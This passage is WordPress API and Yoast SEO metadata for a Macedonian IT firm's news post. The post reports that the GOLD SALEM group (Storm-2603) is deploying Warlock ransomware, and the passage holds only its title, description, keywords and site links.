SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430\" \/>\n<meta property=\"og:description\" content=\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/\" \/>\n<meta property=\"og:site_name\" content=\"KABTEL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Kabtelgroup\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/Kabtelgroup\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-26T11:21:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1536\" \/>\n\t<meta property=\"og:image:height\" content=\"1024\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Julija Damjanovska\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Kabtel\" \/>\n<meta name=\"twitter:site\" content=\"@Kabtel\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Julija Damjanovska\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/\"},\"author\":{\"name\":\"Julija Damjanovska\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#\\\/schema\\\/person\\\/04bcae862c707ff8643077d69b525ba7\"},\"headline\":\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430\",\"datePublished\":\"2025-09-26T11:21:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/\"},\"wordCount\":1104,\"publisher\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/Warlock-ransomware-sophos-kabtel.jpg\",\"keywords\":[\"#\u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440\",\"Antivirus\",\"bekap\",\"bezbednost\",\"cloud\",\"CTU\",\"Cybersecurity\",\"DLS\",\"EDR\",\"endpoint\",\"GOLD SALEM\",\"IAB\",\"KABTEL\",\"kiber\",\"Microsoft\",\"Ransomware\",\"softver\",\"Sophos\",\"Storm-2603\",\"Warlock\",\"\u0430\u043d\u0442\u0438 \u0432\u0438\u0440\u0443\u0441\",\"\u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u0442\",\"\u0431\u0435\u043a\u0430\u043f\",\"\u0437\u0430\u0448\u0442\u0438\u0442\u0430\",\"\u0437\u0430\u0448\u0442\u0438\u0442\u0430 \u043d\u0430 \u043a\u0440\u0430\u0458\u043d\u0430 \u0442\u043e\u0447\u043a\u0430\",\"\u0437\u0430\u0448\u0442\u0438\u0442\u0430 \u043d\u0430 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438\",\"\u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u0430\",\"\u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438\",\"\u0441\u0430\u0458\u0431\u0435\u0440\"],\"articleSection\":[\"Cyber security\",\"News &amp; Events\",\"news&amp;blog\",\"Recommendations\",\"\u0411\u0435\u043a\u0430\u043f\",\"\u0418\u0422 \u0420\u0435\u0448\u0435\u043d\u0438\u0458\u0430\",\"\u041a\u0438\u0431\u0435\u0440 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u0442\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/\",\"url\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/\",\"name\":\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - KABTEL\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/Warlock-ransomware-sophos-kabtel.jpg\",\"datePublished\":\"2025-09-26T11:21:37+00:00\",\"description\":\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#primaryimage\",\"url\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/Warlock-ransomware-sophos-kabtel.jpg\",\"contentUrl\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/Warlock-ransomware-sophos-kabtel.jpg\",\"width\":1536,\"height\":1024,\"caption\":\"Warlock-ransomware-sophos-kabtel\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/ransomware-warlock-gold-salem\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/\",\"name\":\"KABTEL\",\"description\":\"We make IT work\",\"publisher\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#organization\",\"name\":\"KABTEL dooel\",\"url\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/cropped-logo-20-goini-KABTEL-kocka.png\",\"contentUrl\":\"https:\\\/\\\/kabtel.mk\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/cropped-logo-20-goini-KABTEL-kocka.png\",\"width\":512,\"height\":512,\"caption\":\"KABTEL dooel\"},\"image\":{\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/Kabtelgroup\",\"https:\\\/\\\/x.com\\\/Kabtel\",\"https:\\\/\\\/www.instagram.com\\\/kabtel.mk\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/377487\\\/admin\\\/\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCleLLF47J_M1VL2m3m0nKxw\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/#\\\/schema\\\/person\\\/04bcae862c707ff8643077d69b525ba7\",\"name\":\"Julija Damjanovska\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g\",\"caption\":\"Julija Damjanovska\"},\"sameAs\":[\"https:\\\/\\\/kabtel.mk\\\/\",\"https:\\\/\\\/www.facebook.com\\\/Kabtelgroup\",\"https:\\\/\\\/www.instagram.com\\\/kabtel.mk\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/kabtel-ltd\",\"https:\\\/\\\/www.youtube.com\\\/@kabtel1188\"],\"url\":\"https:\\\/\\\/kabtel.mk\\\/en\\\/author\\\/jule\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - KABTEL","description":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/","og_locale":"en_US","og_type":"article","og_title":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430","og_description":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.","og_url":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/","og_site_name":"KABTEL","article_publisher":"https:\/\/www.facebook.com\/Kabtelgroup","article_author":"https:\/\/www.facebook.com\/Kabtelgroup","article_published_time":"2025-09-26T11:21:37+00:00","og_image":[{"width":1536,"height":1024,"url":"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg","type":"image\/jpeg"}],"author":"Julija Damjanovska","twitter_card":"summary_large_image","twitter_creator":"@Kabtel","twitter_site":"@Kabtel","twitter_misc":{"Written by":"Julija Damjanovska","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#article","isPartOf":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/"},"author":{"name":"Julija Damjanovska","@id":"https:\/\/kabtel.mk\/en\/#\/schema\/person\/04bcae862c707ff8643077d69b525ba7"},"headline":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430","datePublished":"2025-09-26T11:21:37+00:00","mainEntityOfPage":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/"},"wordCount":1104,"publisher":{"@id":"https:\/\/kabtel.mk\/en\/#organization"},"image":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#primaryimage"},"thumbnailUrl":"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg","keywords":["#\u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440","Antivirus","bekap","bezbednost","cloud","CTU","Cybersecurity","DLS","EDR","endpoint","GOLD SALEM","IAB","KABTEL","kiber","Microsoft","Ransomware","softver","Sophos","Storm-2603","Warlock","\u0430\u043d\u0442\u0438 \u0432\u0438\u0440\u0443\u0441","\u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u0442","\u0431\u0435\u043a\u0430\u043f","\u0437\u0430\u0448\u0442\u0438\u0442\u0430","\u0437\u0430\u0448\u0442\u0438\u0442\u0430 \u043d\u0430 \u043a\u0440\u0430\u0458\u043d\u0430 \u0442\u043e\u0447\u043a\u0430","\u0437\u0430\u0448\u0442\u0438\u0442\u0430 \u043d\u0430 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438","\u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u0430","\u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438","\u0441\u0430\u0458\u0431\u0435\u0440"],"articleSection":["Cyber security","News &amp; Events","news&amp;blog","Recommendations","\u0411\u0435\u043a\u0430\u043f","\u0418\u0422 \u0420\u0435\u0448\u0435\u043d\u0438\u0458\u0430","\u041a\u0438\u0431\u0435\u0440 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u0442"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/","url":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/","name":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - KABTEL","isPartOf":{"@id":"https:\/\/kabtel.mk\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#primaryimage"},"image":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#primaryimage"},"thumbnailUrl":"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg","datePublished":"2025-09-26T11:21:37+00:00","description":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440. K\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603.","breadcrumb":{"@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#primaryimage","url":"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg","contentUrl":"https:\/\/kabtel.mk\/wp-content\/uploads\/2025\/09\/Warlock-ransomware-sophos-kabtel.jpg","width":1536,"height":1024,"caption":"Warlock-ransomware-sophos-kabtel"},{"@type":"BreadcrumbList","@id":"https:\/\/kabtel.mk\/ransomware-warlock-gold-salem\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kabtel.mk\/en\/"},{"@type":"ListItem","position":2,"name":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430"}]},{"@type":"WebSite","@id":"https:\/\/kabtel.mk\/en\/#website","url":"https:\/\/kabtel.mk\/en\/","name":"KABTEL","description":"We make IT work","publisher":{"@id":"https:\/\/kabtel.mk\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kabtel.mk\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kabtel.mk\/en\/#organization","name":"KABTEL dooel","url":"https:\/\/kabtel.mk\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kabtel.mk\/en\/#\/schema\/logo\/image\/","url":"https:\/\/kabtel.mk\/wp-content\/uploads\/2021\/10\/cropped-logo-20-goini-KABTEL-kocka.png","contentUrl":"https:\/\/kabtel.mk\/wp-content\/uploads\/2021\/10\/cropped-logo-20-goini-KABTEL-kocka.png","width":512,"height":512,"caption":"KABTEL dooel"},"image":{"@id":"https:\/\/kabtel.mk\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Kabtelgroup","https:\/\/x.com\/Kabtel","https:\/\/www.instagram.com\/kabtel.mk\/","https:\/\/www.linkedin.com\/company\/377487\/admin\/","https:\/\/www.youtube.com\/channel\/UCleLLF47J_M1VL2m3m0nKxw"]},{"@type":"Person","@id":"https:\/\/kabtel.mk\/en\/#\/schema\/person\/04bcae862c707ff8643077d69b525ba7","name":"Julija Damjanovska","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/afd8b07d9d941c022122231e009ae839375fc24c5c08e59f4a430da0e2185a84?s=96&d=mm&r=g","caption":"Julija Damjanovska"},"sameAs":["https:\/\/kabtel.mk\/","https:\/\/www.facebook.com\/Kabtelgroup","https:\/\/www.instagram.com\/kabtel.mk\/","https:\/\/www.linkedin.com\/company\/kabtel-ltd","https:\/\/www.youtube.com\/@kabtel1188"],"url":"https:\/\/kabtel.mk\/en\/author\/jule\/"}]}},"_links":{"self":[{"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/posts\/11914","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/comments?post=11914"}],"version-history":[{"count":2,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/posts\/11914\/revisions"}],"predecessor-version":[{"id":11918,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/posts\/11914\/revisions\/11918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/media\/11915"}],"wp:attachment":[{"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/media?parent=11914"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/categories?post=11914"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kabtel.mk\/en\/wp-json\/wp\/v2\/tags?post=11914"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}